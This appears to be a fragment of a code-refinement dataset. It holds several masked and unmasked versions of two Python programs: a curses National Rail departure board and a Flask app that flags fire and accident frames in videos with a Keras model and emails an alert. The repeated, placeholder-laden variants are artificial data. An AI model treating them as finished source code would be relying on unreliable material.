stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-5": "import curses\n\nfrom zeep import Client\nfrom zeep import xsd\nfrom zeep.plugins import HistoryPlugin\nimport time\nfrom datetime import datetime\nimport os\n\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n\nif LDB_TOKEN == '':\n raise Exception(\"Please configure your OpenLDBWS token in getDepartureBoardExample!\")\n\nhistory = HistoryPlugin()\n\nclient = Client(wsdl=WSDL, plugins=[history])\n\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken',\n xsd.ComplexType([\n xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue',\n xsd.String()),\n ])\n)\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n\n while True:\n\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, \"[A]\", curses.A_BOLD)\n stdscr.addstr(height - 3, 6, \"Arrivals\")\n stdscr.addstr(height - 3, 15, \"[D]\", curses.A_BOLD)\n stdscr.addstr(height - 3, 19, \"Departures\")\n stdscr.addstr(height - 2, 2, \"[Q]\", curses.A_BOLD)\n stdscr.addstr(height - 2, 6, \"Quit\")\n stdscr.addstr(height - 2, width - 28, \"Version 1.0 By RaithSphere\")\n stdscr.addstr(1, 2, \"Train info powered by National Rail\")\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n\n stdscr.refresh()\n key = stdscr.getch()\n\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, \"Time\", curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, \"Destination\", curses.A_BOLD)\n stdscr.addstr(5, width - 25, \"Plat\", curses.A_BOLD)\n stdscr.addstr(5, width - 15, \"Expected\", curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n\n services = res2.trainServices.service\n\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = \"?\"\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.location[0].locationName,\n curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != \"On time\":\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, \"Time\", curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, \"Origin\", curses.A_BOLD)\n stdscr.addstr(5, width - 25, \"Plat\", curses.A_BOLD)\n stdscr.addstr(5, width - 15, \"Expected\", curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n\n services = res3.trainServices.service\n\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = \"?\"\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[0].locationName,\n curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != \"On time\":\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
from tensorflow.keras.models import load_model
from collections import deque
import numpy as np
import argparse
from mail import sendmail
import pickle
import imutils
import cv2
import datetime
import time
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
# USAGE
# python predict_video.py --model model/activity.model --label-bin model/lb.pickle --input example_clips/lifting.mp4 --output output/lifting_128avg.avi --size 128
# python predict_video.py --model model/road_activity.model --label-bin model/rd.pickle --input example_clips/fire_footage.mp4 --ou
# tput output/fire_footage2.avi --size 128
# import the necessary packages
from tensorflow.keras.models import load_model
from collections import deque
import numpy as np
import argparse
from mail import sendmail
import pickle
import imutils
import cv2
import datetime
import time
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
#MODEL_PATH = 'model/real_time.model'
#PICKLE_PATH = 'model/real_time.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/'+request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH,PICKLE_PATH,INPUT_VIDEO,OUTPUT_VIDEO,SIZE)
#load the trained model and label binarizer from disk
print("[INFO] loading model and label binarizer...")
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, "rb").read())
# initialize the image mean for mean subtraction along with the
# predictions queue
mean = np.array([123.68, 116.779, 103.939][::1], dtype="float32")
Q = deque(maxlen=SIZE)
# initialize the video stream, pointer to output video file, and
# frame dimensions
vs = cv2.VideoCapture(INPUT_VIDEO)
#vs = cv2.VideoCapture(0)
writer = None
(W, H) = (None, None)
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ""
que = deque()
# loop over frames from the video file stream
while True:
# read the next frame from the file
(grabbed, frame) = vs.read()
count += 1.0
# if the frame was not grabbed, then we have reached the end
# of the stream
if not grabbed:
break
# if the frame dimensions are empty, grab them
if W is None or H is None:
(H, W) = frame.shape[:2]
# clone the output frame, then convert it from BGR to RGB
# ordering, resize the frame to a fixed 224x224, and then
# perform mean subtraction
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype("float32")
frame -= mean
# make predictions on the frame and then update the predictions
# queue
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
# perform prediction averaging over the current history of
# previous predictions
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count("fire") + que.count("accident")
if que.count("fire") > que.count("accident"):
caseDetect = "fire"
else:
caseDetect = "accident"
# draw the activity on the output frame
text = "Alert!!: {}".format(label)
# Changes starts here
alert = ["fire", "accident"]
#currentFrame = 0
#print(label, flag)
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.FONT_HERSHEY_SIMPLEX,
1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
else:
if flag == 1:
end_frame = count - 10
flag = 2
#name = './frame/frame'+str(currentFrame)+'.jpg'
#cv2.imwrite(name,output)
# check if the video writer is None
if writer is None:
# initialize our video writer
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30,
(W, H), True)
# write the output frame to disk
writer.write(output)
# show the output image
cv2.imshow("Output", output)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# changes made here
if annotation != "":
status = sendmail("[email protected]", "Anomaly Detected!!!", "yes")
status = status['email_status']
#total_time = end_time - start_time
#print("Time is: {}".format(str(datetime.timedelta(seconds=(total_time)))))
print("count: {}".format(count))
#print("Frame count: {}".format(f_start))
# release the file pointers
print("[INFO] cleaning up...")
writer.release()
vs.release()
start_frame = start_frame//30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count, start_time=start_frame, end_time=end_frame,
status = status)
if __name__ == '__main__':
app.run(debug=False)
|
flexible
|
{
"blob_id": "ccfcc5b644d592090786ceb35a85124c9d3275ad",
"index": 5719,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] cleaning up...')\n writer.release()\n vs.release()\n start_frame = start_frame // 30\n end_frame = end_frame // 30\n if flag == 1:\n end_frame = count\n end_frame = end_frame // 30\n flag = 2\n print(start_frame, end_frame)\n return render_template('Result1.html', label=annotation, count=count,\n start_time=start_frame, end_time=end_frame, status=status)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/')\ndef index():\n return render_template('Main_page.html')\n\n\[email protected]('/prediction.html')\ndef predict():\n return render_template('prediction.html')\n\n\[email protected]('/About_us.html')\ndef about_us():\n return render_template('About_us.html')\n\n\[email protected]('/Result1.html', methods=['POST'])\ndef Result1():\n global annotation\n if request.method == 'POST':\n MODEL_PATH = 'model/final.model'\n PICKLE_PATH = 'model/final.pickle'\n INPUT_VIDEO = request.form['inp_video']\n out = INPUT_VIDEO.split('.')\n INPUT_VIDEO = 'example_clips/' + request.form['inp_video']\n out = out[0]\n OUTPUT_VIDEO = 'output/' + out + '.avi'\n SIZE = 128\n print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)\n print('[INFO] loading model and label binarizer...')\n model = load_model(MODEL_PATH)\n lb = pickle.loads(open(PICKLE_PATH, 'rb').read())\n mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')\n Q = deque(maxlen=SIZE)\n vs = cv2.VideoCapture(INPUT_VIDEO)\n writer = None\n W, H = None, None\n count = 0.0\n flag = 0\n start_frame = 0\n end_frame = 0\n status = {}\n annotation = ''\n que = deque()\n while True:\n grabbed, frame = vs.read()\n count += 1.0\n if not grabbed:\n break\n if W is None or H is None:\n H, W = frame.shape[:2]\n output = frame.copy()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (224, 224)).astype('float32')\n frame -= mean\n preds = model.predict(np.expand_dims(frame, axis=0))[0]\n Q.append(preds)\n results = np.array(Q).mean(axis=0)\n i = np.argmax(results)\n label = lb.classes_[i]\n if len(que) == 30:\n que.popleft()\n if len(que) != 30:\n que.append(label)\n noOfAlerts = que.count('fire') + que.count('accident')\n if que.count('fire') > que.count('accident'):\n caseDetect = 'fire'\n else:\n caseDetect = 'accident'\n text = 'Alert!!: {}'.format(label)\n alert = ['fire', 'accident']\n if len(que) == 30:\n if caseDetect in alert and noOfAlerts > 20:\n cv2.putText(output, text, (35, 50), cv2.\n FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)\n if flag == 0:\n annotation = caseDetect\n start_frame = count - 20\n flag = 1\n elif flag == 1:\n end_frame = count - 10\n flag = 2\n if writer is None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True\n )\n writer.write(output)\n cv2.imshow('Output', output)\n key = cv2.waitKey(1) & 255\n if key == ord('q'):\n break\n if annotation != '':\n status = sendmail('[email protected]',\n 'Anomaly Detected!!!', 'yes')\n status = status['email_status']\n print('count: {}'.format(count))\n print('[INFO] 